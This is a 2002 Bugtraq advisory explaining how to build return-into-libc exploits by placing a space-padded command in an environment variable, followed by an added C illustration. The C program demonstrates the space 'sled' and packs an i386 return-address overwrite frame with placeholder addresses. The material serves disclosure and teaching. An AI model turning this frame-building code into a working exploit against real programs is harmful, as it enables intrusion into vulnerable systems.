Bugtraq mailing list archives

Using Environment for returning into Lib C
From: "Elie aka \"Lupin\" Bursztein" <elie () bursztein net>
Date: Tue, 26 Feb 2002 19:27:59 -0800

This advisory presents a new way to build a return-into-libc exploit.


By placing the argument string in an environment variable, one can easily
exploit a buffer overflow with the return-into-libc technique.

If we make an analogy with the shellcode technique:
the space byte (\x20) plays the role of the NOP (\x90). For the system() function the string "/bin/sh" is equivalent
to "          /bin/sh", since the shell ignores leading whitespace, so a pointer anywhere into the run of spaces yields the same command.
The overwritten return address is the address of system().
The argument address is the address of our environment variable.
This gives flexibility in the argument passed and helps in chaining return-into-libc calls.
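The following C program is an added illustration, not part of the post above or of the code on the author's site. It shows the property the analogy relies on: a value exported as "<N spaces><command>" is parsed by /bin/sh -c to the same command from any offset inside the space run, while one byte past the run clips the command. It also packs the classic i386 frame [ &system ][ fake return ][ pointer into the sled ] that overwrites the saved return address. The environment variable name SLED, the command "exit 7" and the three addresses are constructed placeholders, not values from any real target.

```c
/* Added example: the \x20 "sled" in an environment variable for a
 * return-into-libc call to system(). Constructed inputs; no real target. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/wait.h>

/* Build "<pad spaces><cmd>" and export it as environment variable `name`,
 * as an attacker would before execve() of the vulnerable program.
 * Returns the address this process sees for the value (NULL on failure). */
static char *export_padded_command(const char *name, const char *cmd, size_t pad)
{
    size_t len = pad + strlen(cmd);
    char *val = malloc(len + 1);
    if (!val) return NULL;
    memset(val, ' ', pad);
    strcpy(val + pad, cmd);
    int rc = setenv(name, val, 1);   /* setenv() copies the string */
    free(val);
    return rc == 0 ? getenv(name) : NULL;
}

/* Width of the space sled: every offset 0..sled_width() into the value
 * starts a string that /bin/sh -c parses as the same command. */
static size_t sled_width(const char *value)
{
    size_t n = 0;
    while (value[n] == ' ') n++;
    return n;
}

/* Call system() on the value starting at `offset`, as the hijacked return
 * into system() would with an imprecise pointer into the sled.
 * Returns the shell's exit status, or -1 if system() failed. */
static int run_from_offset(const char *value, size_t offset)
{
    int st = system(value + offset);
    if (st == -1 || !WIFEXITED(st)) return -1;
    return WEXITSTATUS(st);
}

/* Classic i386 return-into-libc frame written over the saved return address:
 * [ &system ][ fake return for system ][ arg = pointer into the sled ].
 * `out` must hold 12 bytes; words are 32-bit little-endian. */
static void write_ret2libc_frame(unsigned char *out, uint32_t system_addr,
                                 uint32_t after_ret, uint32_t arg_ptr)
{
    uint32_t words[3] = { system_addr, after_ret, arg_ptr };
    for (int i = 0; i < 3; i++)
        for (int b = 0; b < 4; b++)
            out[i * 4 + b] = (unsigned char)(words[i] >> (8 * b));
}

int main(void)
{
    /* Constructed command: exits with status 7 so the effect is observable. */
    char *val = export_padded_command("SLED", "exit 7", 64);
    if (!val) return 1;
    size_t w = sled_width(val);
    printf("value at %p, sled width %zu bytes\n", (void *)val, w);
    printf("offset %2zu -> exit status %d\n", (size_t)0, run_from_offset(val, 0));
    printf("offset %2zu -> exit status %d\n", w / 2, run_from_offset(val, w / 2));
    printf("offset %2zu -> exit status %d\n", w, run_from_offset(val, w));
    /* One byte past the sled turns the command into "xit 7": the shell fails. */
    printf("offset %2zu -> exit status %d\n", w + 1, run_from_offset(val, w + 1));

    /* Placeholder addresses (not from any real binary): any pointer in
     * [val, val + w] would serve as the third word. */
    unsigned char frame[12];
    write_ret2libc_frame(frame, 0x40058ae0u, 0x41414141u, 0xbffffe00u);
    printf("frame:");
    for (int i = 0; i < 12; i++) printf(" %02x", frame[i]);
    printf("\n");
    return 0;
}
```

The wider the sled, the less precisely the argument address needs to be known; in the real attack the value lives on the target's stack (where the kernel copies the environment at exec time), and the attacker only has to land the pointer anywhere in the spaces.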


Related article describing this technique, with example source code: http://www.bursztein.net/secu/rilc.html

This technique should open up a new range of return-into-libc exploits.


Elie aka "Lupin" Bursztein
icq  : 32228319
mail : elie () bursztein net
web  : www.bursztein.net
"Simplicity is difficulty"
